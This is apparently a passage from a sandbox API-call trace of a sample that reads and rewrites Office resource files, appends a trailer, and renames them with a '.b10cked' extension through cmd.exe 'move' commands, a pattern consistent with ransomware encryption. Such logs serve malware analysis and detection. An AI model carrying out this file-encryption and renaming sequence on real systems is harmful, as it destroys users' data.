lpDistanceToMoveHigh=0x12ec78*=0) returned 0x19b1 [0172.846] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x19af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x19af, lpOverlapped=0x0) returned 1 [0172.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6575, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x19b1 [0172.846] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, 
nNumberOfBytesToWrite=0x19af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x19af, lpOverlapped=0x0) returned 1 [0172.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SGRES.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0172.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SGRES.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x1328744, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SGRES.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 17 [0172.850] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3360 [0172.850] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0172.850] CloseHandle (hObject=0x114) returned 1 [0172.851] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX") returned 0x3c [0172.852] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0172.852] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, 
lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x8a8, dwThreadId=0x954)) returned 1 [0172.854] CloseHandle (hObject=0x1b4) returned 1 [0172.854] CloseHandle (hObject=0x114) returned 1 [0172.854] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.854] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.854] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0172.854] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.854] ReleaseMutex (hMutex=0xf8) returned 1 [0172.854] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.854] ReleaseMutex (hMutex=0xf8) returned 1 [0172.854] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.854] ReleaseMutex (hMutex=0xf8) returned 1 [0172.854] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) 
returned 0x0 [0172.854] ReleaseMutex (hMutex=0xf8) returned 1 [0172.854] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0172.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.854] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22964367218) returned 1 [0172.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4360 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.855] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3e78 [0172.856] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, 
lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4360 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4360 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.901] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x21af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x21af, lpOverlapped=0x0) returned 1 [0172.926] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.926] 
WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x21af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x21af, lpOverlapped=0x0) returned 1 [0172.926] SetFilePointer (in: hFile=0x114, lDistanceToMove=-8623, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x21b1 [0172.926] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x21af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x21af, lpOverlapped=0x0) returned 1 [0172.926] SetFilePointer (in: hFile=0x114, lDistanceToMove=-8623, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x21b1 [0172.926] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x21af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x21af, lpOverlapped=0x0) returned 1 [0172.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0172.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0172.930] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4360 [0172.930] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0172.930] 
CloseHandle (hObject=0x114) returned 1 [0172.931] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX") returned 0x3c [0172.932] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0172.933] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xac0, dwThreadId=0xa74)) returned 1 [0172.934] CloseHandle (hObject=0x1b4) returned 1 [0172.934] CloseHandle (hObject=0x114) returned 1 [0172.935] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.935] CharUpperBuffW (in: lpsz="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.935] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0172.935] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.935] ReleaseMutex (hMutex=0xf8) returned 1 [0172.935] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.935] ReleaseMutex (hMutex=0xf8) returned 1 [0172.935] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.935] ReleaseMutex (hMutex=0xf8) returned 1 [0172.935] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.935] ReleaseMutex (hMutex=0xf8) returned 1 [0172.935] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0172.935] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.935] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22972478439) returned 1 [0172.936] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.936] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6960 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.937] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x6478 [0172.937] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0172.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0172.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 